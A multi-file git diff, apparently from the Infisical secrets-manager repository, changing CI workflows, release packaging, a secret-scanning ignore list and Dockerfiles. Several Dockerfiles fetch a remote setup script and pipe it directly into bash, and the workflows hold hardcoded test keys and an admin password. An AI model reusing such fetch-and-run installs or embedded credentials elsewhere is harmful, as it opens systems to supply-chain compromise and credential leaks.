--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
--from-literal=SITE_URL=http://localhost:8080
- name: Create bootstrap secret
run: |
kubectl create secret generic infisical-bootstrap-credentials \
--namespace infisical-standalone-postgres \
--from-literal=INFISICAL_ADMIN_EMAIL=admin@example.com \
--from-literal=INFISICAL_ADMIN_PASSWORD=admin-password
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-standalone-postgres \
--helm-extra-args="--timeout=300s" \
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres --set infisical.autoBootstrap.enabled=true" \
--namespace infisical-standalone-postgres


@@ -1,38 +0,0 @@
name: Run Helm Chart Tests for Secret Operator
on:
pull_request:
paths:
- "helm-charts/secrets-operator/**"
- ".github/workflows/run-helm-chart-tests-secret-operator.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Run chart-testing (install)
run: ct install --config ct.yaml --charts helm-charts/secrets-operator


@@ -1,67 +0,0 @@
name: "Validate DB schemas"
on:
pull_request:
types: [opened, synchronize]
paths:
- "backend/**"
workflow_call:
jobs:
validate-db-schemas:
name: Validate DB schemas
runs-on: ubuntu-latest
timeout-minutes: 15
env:
NODE_OPTIONS: "--max-old-space-size=8192"
REDIS_URL: redis://172.17.0.1:6379
DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
AUTH_SECRET: something-random
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
steps:
- name: ☁️ Checkout source
uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: KengoTODA/actions-setup-docker-compose@v1
if: ${{ env.ACT }}
name: Install `docker compose` for local simulations
with:
version: "2.14.2"
- name: 🔧 Setup Node 20
uses: actions/setup-node@v3
with:
node-version: "20"
cache: "npm"
cache-dependency-path: backend/package-lock.json
- name: Start PostgreSQL and Redis
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Install dependencies
run: npm install
working-directory: backend
- name: Apply migrations
run: npm run migration:latest-dev
working-directory: backend
- name: Run schema generation
run: npm run generate:schema
working-directory: backend
- name: Check for schema changes
run: |
if ! git diff --exit-code --quiet src/db/schemas; then
echo "❌ Generated schemas differ from committed schemas!"
echo "Run 'npm run generate:schema' locally and commit the changes."
git diff src/db/schemas
exit 1
fi
echo "✅ Schemas are up to date"
working-directory: backend
- name: Cleanup
if: always()
run: |
docker compose -f "docker-compose.dev.yml" down

.goreleaser.yaml (new file, 223 lines)

@@ -0,0 +1,223 @@
# This is an example .goreleaser.yml file with some sensible defaults.
# Make sure to check the documentation at https://goreleaser.com
# before:
# hooks:
# # You may remove this if you don't use go modules.
# - cd cli && go mod tidy
# # you may remove this if you don't need go generate
# - cd cli && go generate ./...
before:
hooks:
- ./cli/scripts/completions.sh
- ./cli/scripts/manpages.sh
monorepo:
tag_prefix: infisical-cli/
dir: cli
builds:
- id: darwin-build
binary: infisical
ldflags:
- -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
- -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
flags:
- -trimpath
env:
- CGO_ENABLED=1
- CC=/home/runner/work/osxcross/target/bin/o64-clang
- CXX=/home/runner/work/osxcross/target/bin/o64-clang++
goos:
- darwin
ignore:
- goos: darwin
goarch: "386"
dir: ./cli
- id: all-other-builds
env:
- CGO_ENABLED=0
binary: infisical
ldflags:
- -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
- -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
flags:
- -trimpath
goos:
- freebsd
- linux
- netbsd
- openbsd
- windows
goarch:
- "386"
- amd64
- arm
- arm64
goarm:
- "6"
- "7"
ignore:
- goos: windows
goarch: "386"
- goos: freebsd
goarch: "386"
dir: ./cli
archives:
- format_overrides:
- goos: windows
format: zip
files:
- ../README*
- ../LICENSE*
- ../manpages/*
- ../completions/*
release:
replace_existing_draft: true
mode: "replace"
checksum:
name_template: "checksums.txt"
snapshot:
name_template: "{{ .Version }}-devel"
# publishers:
# - name: fury.io
# ids:
# - infisical
# dir: "{{ dir .ArtifactPath }}"
# cmd: curl -F package=@{{ .ArtifactName }} https://{{ .Env.FURY_TOKEN }}@push.fury.io/infisical/
brews:
- name: infisical
tap:
owner: Infisical
name: homebrew-get-cli
commit_author:
name: "Infisical"
email: ai@infisical.com
folder: Formula
homepage: "https://infisical.com"
description: "The official Infisical CLI"
install: |-
bin.install "infisical"
bash_completion.install "completions/infisical.bash" => "infisical"
zsh_completion.install "completions/infisical.zsh" => "_infisical"
fish_completion.install "completions/infisical.fish"
man1.install "manpages/infisical.1.gz"
- name: "infisical@{{.Version}}"
tap:
owner: Infisical
name: homebrew-get-cli
commit_author:
name: "Infisical"
email: ai@infisical.com
folder: Formula
homepage: "https://infisical.com"
description: "The official Infisical CLI"
install: |-
bin.install "infisical"
bash_completion.install "completions/infisical.bash" => "infisical"
zsh_completion.install "completions/infisical.zsh" => "_infisical"
fish_completion.install "completions/infisical.fish"
man1.install "manpages/infisical.1.gz"
nfpms:
- id: infisical
package_name: infisical
builds:
- all-other-builds
vendor: Infisical, Inc
homepage: https://infisical.com/
maintainer: Infisical, Inc
description: The offical Infisical CLI
license: MIT
formats:
- rpm
- deb
- apk
- archlinux
bindir: /usr/bin
contents:
- src: ./completions/infisical.bash
dst: /etc/bash_completion.d/infisical
- src: ./completions/infisical.fish
dst: /usr/share/fish/vendor_completions.d/infisical.fish
- src: ./completions/infisical.zsh
dst: /usr/share/zsh/site-functions/_infisical
- src: ./manpages/infisical.1.gz
dst: /usr/share/man/man1/infisical.1.gz
scoop:
bucket:
owner: Infisical
name: scoop-infisical
commit_author:
name: "Infisical"
email: ai@infisical.com
homepage: "https://infisical.com"
description: "The official Infisical CLI"
license: MIT
aurs:
- name: infisical-bin
homepage: "https://infisical.com"
description: "The official Infisical CLI"
maintainers:
- Infisical, Inc <support@infisical.com>
license: MIT
private_key: "{{ .Env.AUR_KEY }}"
git_url: "ssh://aur@aur.archlinux.org/infisical-bin.git"
package: |-
# bin
install -Dm755 "./infisical" "${pkgdir}/usr/bin/infisical"
# license
install -Dm644 "./LICENSE" "${pkgdir}/usr/share/licenses/infisical/LICENSE"
# completions
mkdir -p "${pkgdir}/usr/share/bash-completion/completions/"
mkdir -p "${pkgdir}/usr/share/zsh/site-functions/"
mkdir -p "${pkgdir}/usr/share/fish/vendor_completions.d/"
install -Dm644 "./completions/infisical.bash" "${pkgdir}/usr/share/bash-completion/completions/infisical"
install -Dm644 "./completions/infisical.zsh" "${pkgdir}/usr/share/zsh/site-functions/_infisical"
install -Dm644 "./completions/infisical.fish" "${pkgdir}/usr/share/fish/vendor_completions.d/infisical.fish"
# man pages
install -Dm644 "./manpages/infisical.1.gz" "${pkgdir}/usr/share/man/man1/infisical.1.gz"
dockers:
- dockerfile: docker/alpine
goos: linux
goarch: amd64
use: buildx
ids:
- all-other-builds
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
- "infisical/cli:latest-amd64"
build_flag_templates:
- "--pull"
- "--platform=linux/amd64"
- dockerfile: docker/alpine
goos: linux
goarch: amd64
use: buildx
ids:
- all-other-builds
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
- "infisical/cli:latest-arm64"
build_flag_templates:
- "--pull"
- "--platform=linux/arm64"
docker_manifests:
- name_template: "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}"
image_templates:
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
- "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
- name_template: "infisical/cli:latest"
image_templates:
- "infisical/cli:latest-amd64"
- "infisical/cli:latest-arm64"


@@ -8,45 +8,3 @@ frontend/src/views/Project/MembersPage/components/MemberListTab/MemberRoleForm/S
docs/mint.json:generic-api-key:651
backend/src/ee/services/hsm/hsm-service.ts:generic-api-key:134
docs/documentation/platform/audit-log-streams/audit-log-streams.mdx:generic-api-key:104
docs/cli/commands/bootstrap.mdx:jwt:86
docs/documentation/platform/audit-log-streams/audit-log-streams.mdx:generic-api-key:102
docs/self-hosting/guides/automated-bootstrapping.mdx:jwt:74
frontend/src/pages/secret-manager/SecretDashboardPage/components/SecretListView/SecretDetailSidebar.tsx:generic-api-key:72
k8-operator/config/samples/crd/pushsecret/source-secret-with-templating.yaml:private-key:11
k8-operator/config/samples/crd/pushsecret/push-secret-with-template.yaml:private-key:52
backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts:generic-api-key:125
frontend/src/components/permissions/AccessTree/nodes/RoleNode.tsx:generic-api-key:67
frontend/src/components/secret-rotations-v2/RotateSecretRotationV2Modal.tsx:generic-api-key:14
frontend/src/components/secret-rotations-v2/SecretRotationV2StatusBadge.tsx:generic-api-key:11
frontend/src/components/secret-rotations-v2/ViewSecretRotationV2GeneratedCredentials/ViewSecretRotationV2GeneratedCredentials.tsx:generic-api-key:23
frontend/src/hooks/api/secretRotationsV2/types/index.ts:generic-api-key:28
frontend/src/hooks/api/secretRotationsV2/types/index.ts:generic-api-key:65
frontend/src/pages/secret-manager/SecretDashboardPage/components/SecretRotationListView/SecretRotationItem.tsx:generic-api-key:26
docs/documentation/platform/kms/overview.mdx:generic-api-key:281
docs/documentation/platform/kms/overview.mdx:generic-api-key:344
frontend/src/pages/secret-manager/OverviewPage/components/SecretOverviewTableRow/SecretOverviewTableRow.tsx:generic-api-key:85
docs/cli/commands/user.mdx:generic-api-key:51
frontend/src/pages/secret-manager/OverviewPage/components/SecretOverviewTableRow/SecretOverviewTableRow.tsx:generic-api-key:76
docs/integrations/app-connections/hashicorp-vault.mdx:generic-api-key:188
cli/detect/config/gitleaks.toml:gcp-api-key:567
cli/detect/config/gitleaks.toml:gcp-api-key:569
cli/detect/config/gitleaks.toml:gcp-api-key:570
cli/detect/config/gitleaks.toml:gcp-api-key:572
cli/detect/config/gitleaks.toml:gcp-api-key:574
cli/detect/config/gitleaks.toml:gcp-api-key:575
cli/detect/config/gitleaks.toml:gcp-api-key:576
cli/detect/config/gitleaks.toml:gcp-api-key:577
cli/detect/config/gitleaks.toml:gcp-api-key:578
cli/detect/config/gitleaks.toml:gcp-api-key:579
cli/detect/config/gitleaks.toml:gcp-api-key:581
cli/detect/config/gitleaks.toml:gcp-api-key:582
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:51
.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:50
.github/workflows/helm-release-infisical-core.yml:generic-api-key:48
.github/workflows/helm-release-infisical-core.yml:generic-api-key:47
backend/src/services/smtp/smtp-service.ts:generic-api-key:79
frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
docs/integrations/app-connections/railway.mdx:generic-api-key:156
.github/workflows/validate-db-schemas.yml:generic-api-key:21


@@ -19,7 +19,7 @@ WORKDIR /app
# Copy dependencies
COPY --from=frontend-dependencies /app/node_modules ./node_modules
# Copy all files
# Copy all files
COPY /frontend .
ENV NODE_ENV production
@@ -32,9 +32,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
ARG INFISICAL_PLATFORM_VERSION
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ARG CAPTCHA_SITE_KEY
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
ENV NODE_OPTIONS="--max-old-space-size=8192"
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
# Build
RUN npm run build
@@ -117,12 +115,6 @@ FROM base AS production
# Install necessary packages including ODBC
RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
libtool \
wget \
libssl-dev \
ca-certificates \
curl \
git \
@@ -140,22 +132,9 @@ RUN apt-get update && apt-get install -y \
# Configure ODBC in production
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
WORKDIR /openssl-build
RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
&& tar -xf openssl-3.1.2.tar.gz \
&& cd openssl-3.1.2 \
&& ./Configure enable-fips \
&& make \
&& make install_fips \
&& cd / \
&& rm -rf /openssl-build \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.41.89 \
RUN curl -1sLf 'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.31.1 \
&& rm -rf /var/lib/apt/lists/*
RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user
@@ -176,29 +155,19 @@ ENV INTERCOM_ID=$INTERCOM_ID
ARG CAPTCHA_SITE_KEY
ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY
WORKDIR /
WORKDIR /
COPY --from=backend-runner /app /backend
COPY --from=frontend-runner /app ./backend/frontend-build
ARG INFISICAL_PLATFORM_VERSION
ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ENV PORT 8080
ENV HOST=0.0.0.0
ENV HTTPS_ENABLED false
ENV HTTPS_ENABLED false
ENV NODE_ENV production
ENV STANDALONE_BUILD true
ENV STANDALONE_BUILD true
ENV STANDALONE_MODE true
ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
ENV NODE_OPTIONS="--max-old-space-size=8192 --force-fips"
# FIPS mode of operation:
ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
ENV FIPS_ENABLED=true
WORKDIR /backend
@@ -207,15 +176,6 @@ ENV TELEMETRY_ENABLED true
EXPOSE 8080
EXPOSE 443
# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
mv dist/main.mjs.tmp dist/main.mjs
# The OpenSSL library is installed in different locations in different architectures (x86_64 and arm64).
# This is a workaround to avoid errors when the library is not found.
RUN ln -sf /usr/local/lib64/ossl-modules /usr/local/lib/ossl-modules || \
ln -sf /usr/local/lib/ossl-modules /usr/local/lib64/ossl-modules
USER non-root-user
CMD ["./standalone-entrypoint.sh"]
CMD ["./standalone-entrypoint.sh"]


@@ -3,10 +3,13 @@ ARG POSTHOG_API_KEY=posthog-api-key
ARG INTERCOM_ID=intercom-id
ARG CAPTCHA_SITE_KEY=captcha-site-key
FROM node:20-slim AS base
FROM node:20-alpine AS base
FROM base AS frontend-dependencies
# Check https://github.com/nodejs/docker-node/tree/b4117f9333da4138b03a546ec926ef50a31506c3#nodealpine to understand why libc6-compat might be needed.
RUN apk add --no-cache libc6-compat
WORKDIR /app
COPY frontend/package.json frontend/package-lock.json ./
@@ -20,7 +23,7 @@ WORKDIR /app
# Copy dependencies
COPY --from=frontend-dependencies /app/node_modules ./node_modules
# Copy all files
# Copy all files
COPY /frontend .
ENV NODE_ENV production
@@ -33,8 +36,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
ARG INFISICAL_PLATFORM_VERSION
ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ARG CAPTCHA_SITE_KEY
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
ENV NODE_OPTIONS="--max-old-space-size=8192"
ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
# Build
RUN npm run build
@@ -43,8 +45,8 @@ RUN npm run build
FROM base AS frontend-runner
WORKDIR /app
RUN groupadd --system --gid 1001 nodejs
RUN useradd --system --uid 1001 --gid nodejs non-root-user
RUN addgroup --system --gid 1001 nodejs
RUN adduser --system --uid 1001 non-root-user
COPY --from=frontend-builder --chown=non-root-user:nodejs /app/dist ./
@@ -54,23 +56,21 @@ USER non-root-user
## BACKEND
##
FROM base AS backend-build
RUN addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 non-root-user
WORKDIR /app
# Install all required dependencies for build
RUN apt-get update && apt-get install -y \
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
&& rm -rf /var/lib/apt/lists/*
RUN groupadd --system --gid 1001 nodejs
RUN useradd --system --uid 1001 --gid nodejs non-root-user
freetds-dev
COPY backend/package*.json ./
RUN npm ci --only-production
@@ -78,7 +78,6 @@ RUN npm ci --only-production
COPY /backend .
COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
RUN npm i -D tsconfig-paths
ENV NODE_OPTIONS="--max-old-space-size=8192"
RUN npm run build
# Production stage
@@ -87,19 +86,18 @@ FROM base AS backend-runner
WORKDIR /app
# Install all required dependencies for runtime
RUN apt-get update && apt-get install -y \
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
&& rm -rf /var/lib/apt/lists/*
freetds-dev
# Configure ODBC
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
COPY backend/package*.json ./
RUN npm ci --only-production
@@ -111,36 +109,34 @@ RUN mkdir frontend-build
# Production stage
FROM base AS production
RUN apt-get update && apt-get install -y \
ca-certificates \
bash \
curl \
git \
RUN apk add --upgrade --no-cache ca-certificates
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.31.1 && apk add --no-cache git
WORKDIR /
# Install all required runtime dependencies
RUN apk --update add \
python3 \
make \
g++ \
unixodbc \
freetds-bin \
freetds \
unixodbc-dev \
libc-dev \
freetds-dev \
wget \
openssh-client \
&& rm -rf /var/lib/apt/lists/*
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
&& apt-get update && apt-get install -y infisical=0.41.89 \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /
bash \
curl \
git \
openssh
# Configure ODBC in production
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Setup user permissions
RUN groupadd --system --gid 1001 nodejs \
&& useradd --system --uid 1001 --gid nodejs non-root-user
RUN addgroup --system --gid 1001 nodejs \
&& adduser --system --uid 1001 non-root-user
# Give non-root-user permission to update SSL certs
RUN chown -R non-root-user /etc/ssl/certs
@@ -158,20 +154,18 @@ ENV INTERCOM_ID=$INTERCOM_ID
ARG CAPTCHA_SITE_KEY
ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY
COPY --from=backend-runner /app /backend
COPY --from=frontend-runner /app ./backend/frontend-build
ARG INFISICAL_PLATFORM_VERSION
ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
ENV PORT 8080
ENV HOST=0.0.0.0
ENV HTTPS_ENABLED false
ENV HTTPS_ENABLED false
ENV NODE_ENV production
ENV STANDALONE_BUILD true
ENV STANDALONE_BUILD true
ENV STANDALONE_MODE true
ENV NODE_OPTIONS="--max-old-space-size=1024"
WORKDIR /backend
ENV TELEMETRY_ENABLED true


@@ -50,7 +50,7 @@ We're on a mission to make security tooling more accessible to everyone, not jus
- **[Dashboard](https://infisical.com/docs/documentation/platform/project)**: Manage secrets across projects and environments (e.g. development, production, etc.) through a user-friendly interface.
- **[Native Integrations](https://infisical.com/docs/integrations/overview)**: Sync secrets to platforms like [GitHub](https://infisical.com/docs/integrations/cicd/githubactions), [Vercel](https://infisical.com/docs/integrations/cloud/vercel), [AWS](https://infisical.com/docs/integrations/cloud/aws-secret-manager), and use tools like [Terraform](https://infisical.com/docs/integrations/frameworks/terraform), [Ansible](https://infisical.com/docs/integrations/platforms/ansible), and more.
- **[Secret versioning](https://infisical.com/docs/documentation/platform/secret-versioning)** and **[Point-in-Time Recovery](https://infisical.com/docs/documentation/platform/pit-recovery)**: Keep track of every secret and project state; roll back when needed.
- **[Secret Rotation](https://infisical.com/docs/documentation/platform/secret-rotation/overview)**: Rotate secrets at regular intervals for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/secret-rotation/postgres-credentials), [MySQL](https://infisical.com/docs/documentation/platform/secret-rotation/mysql), [AWS IAM](https://infisical.com/docs/documentation/platform/secret-rotation/aws-iam), and more.
- **[Secret Rotation](https://infisical.com/docs/documentation/platform/secret-rotation/overview)**: Rotate secrets at regular intervals for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/secret-rotation/postgres), [MySQL](https://infisical.com/docs/documentation/platform/secret-rotation/mysql), [AWS IAM](https://infisical.com/docs/documentation/platform/secret-rotation/aws-iam), and more.
- **[Dynamic Secrets](https://infisical.com/docs/documentation/platform/dynamic-secrets/overview)**: Generate ephemeral secrets on-demand for services like [PostgreSQL](https://infisical.com/docs/documentation/platform/dynamic-secrets/postgresql), [MySQL](https://infisical.com/docs/documentation/platform/dynamic-secrets/mysql), [RabbitMQ](https://infisical.com/docs/documentation/platform/dynamic-secrets/rabbit-mq), and more.
- **[Secret Scanning and Leak Prevention](https://infisical.com/docs/cli/scanning-overview)**: Prevent secrets from leaking to git.
- **[Infisical Kubernetes Operator](https://infisical.com/docs/documentation/getting-started/kubernetes)**: Deliver secrets to your Kubernetes workloads and automatically reload deployments.
@@ -149,8 +149,11 @@ Not sure where to get started? You can:
- Join our <a href="https://infisical.com/slack">Slack</a>, and ask us any questions there.
## We are hiring!
## Resources
If you're reading this, there is a strong chance you like the products we created.
You might also make a great addition to our team. We're growing fast and would love for you to [join us](https://infisical.com/careers).
- [Docs](https://infisical.com/docs/documentation/getting-started/introduction) for comprehensive documentation and guides
- [Slack](https://infisical.com/slack) for discussion with the community and Infisical team.
- [GitHub](https://github.com/Infisical/infisical) for code, issues, and pull requests
- [Twitter](https://twitter.com/infisical) for fast news
- [YouTube](https://www.youtube.com/@infisical_os) for videos on secret management
- [Blog](https://infisical.com/blog) for secret management insights, articles, tutorials, and updates


@@ -69,15 +69,6 @@ module.exports = {
["^\\."]
]
}
],
"import/extensions": [
"error",
"ignorePackages",
{
"": "never", // this is required to get the .tsx to work...
ts: "never",
tsx: "never"
}
]
}
};


@@ -1,23 +1,23 @@
# Build stage
FROM node:20-slim AS build
FROM node:20-alpine AS build
WORKDIR /app
# Required for pkcs11js
RUN apt-get update && apt-get install -y \
python3 \
make \
g++ \
openssh-client \
openssl
RUN apk --update add \
python3 \
make \
g++ \
openssh
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds-bin \
freetds-dev \
freetds \
unixodbc-dev \
libc-dev
libc-dev \
freetds-dev
COPY package*.json ./
RUN npm ci --only-production
@@ -26,39 +26,39 @@ COPY . .
RUN npm run build
# Production stage
FROM node:20-slim
FROM node:20-alpine
WORKDIR /app
ENV npm_config_cache /home/node/.npm
COPY package*.json ./
RUN apt-get update && apt-get install -y \
python3 \
make \
g++
RUN apk --update add \
python3 \
make \
g++
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds-bin \
freetds-dev \
freetds \
unixodbc-dev \
libc-dev
libc-dev \
freetds-dev
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
RUN npm ci --only-production && npm cache clean --force
COPY --from=build /app .
# Install Infisical CLI
RUN apt-get install -y curl bash && \
curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && apt-get install -y infisical=0.41.89 git
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.8.1 && apk add --no-cache git
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
CMD node healthcheck.js
HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
CMD node healthcheck.js
ENV HOST=0.0.0.0
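For readability: the second printf of the pair above — the Alpine-path variant that matches the node:20-alpine base this Dockerfile switches to — writes an /etc/odbcinst.ini equivalent to the following, registering the FreeTDS ODBC driver needed for SAP ASE dynamic secrets:

    [FreeTDS]
    Description = FreeTDS Driver
    Driver = /usr/lib/libtdsodbc.so
    Setup = /usr/lib/libtdsodbc.so
    FileUsage = 1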


@@ -1,4 +1,4 @@
FROM node:20-slim
FROM node:20-alpine
# ? Setup a test SoftHSM module. In production a real HSM is used.
@@ -7,33 +7,32 @@ ARG SOFTHSM2_VERSION=2.5.0
ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \
SOFTHSM2_SOURCES=/tmp/softhsm2
# Install build dependencies including python3 (required for pkcs11js and partially TDS driver)
RUN apt-get update && apt-get install -y \
build-essential \
autoconf \
automake \
git \
libtool \
libssl-dev \
python3 \
make \
g++ \
openssh-client \
openssl \
curl \
pkg-config
# install build dependencies including python3 (required for pkcs11js and partially TDS driver)
RUN apk --update add \
alpine-sdk \
autoconf \
automake \
git \
libtool \
openssl-dev \
python3 \
make \
g++ \
openssh
# Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apt-get install -y \
# install dependencies for TDS driver (required for SAP ASE dynamic secrets)
RUN apk add --no-cache \
unixodbc \
freetds \
unixodbc-dev \
freetds-dev \
freetds-bin \
tdsodbc
libc-dev \
freetds-dev
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# Build and install SoftHSM2
RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/libtdsodbc.so\nSetup = /usr/lib/libtdsodbc.so\nFileUsage = 1\n" > /etc/odbcinst.ini
# build and install SoftHSM2
RUN git clone https://github.com/opendnssec/SoftHSMv2.git ${SOFTHSM2_SOURCES}
WORKDIR ${SOFTHSM2_SOURCES}
@@ -46,18 +45,16 @@ RUN git checkout ${SOFTHSM2_VERSION} -b ${SOFTHSM2_VERSION} \
WORKDIR /root
RUN rm -fr ${SOFTHSM2_SOURCES}
# Install pkcs11-tool
RUN apt-get install -y opensc
# install pkcs11-tool
RUN apk --update add opensc
RUN mkdir -p /etc/softhsm2/tokens && \
softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
RUN softhsm2-util --init-token --slot 0 --label "auth-app" --pin 1234 --so-pin 0000
# ? App setup
# Install Infisical CLI
RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
apt-get update && \
apt-get install -y infisical=0.41.89
RUN apk add --no-cache bash curl && curl -1sLf \
'https://dl.cloudsmith.io/public/infisical/infisical-cli/setup.alpine.sh' | bash \
&& apk add infisical=0.8.1 && apk add --no-cache git
WORKDIR /app


@@ -1,90 +0,0 @@
FROM node:20-slim
# ? Setup a test SoftHSM module. In production a real HSM is used.
ARG SOFTHSM2_VERSION=2.5.0
ENV SOFTHSM2_VERSION=${SOFTHSM2_VERSION} \
SOFTHSM2_SOURCES=/tmp/softhsm2
# Install build dependencies including python3 (required for pkcs11js and partially TDS driver)
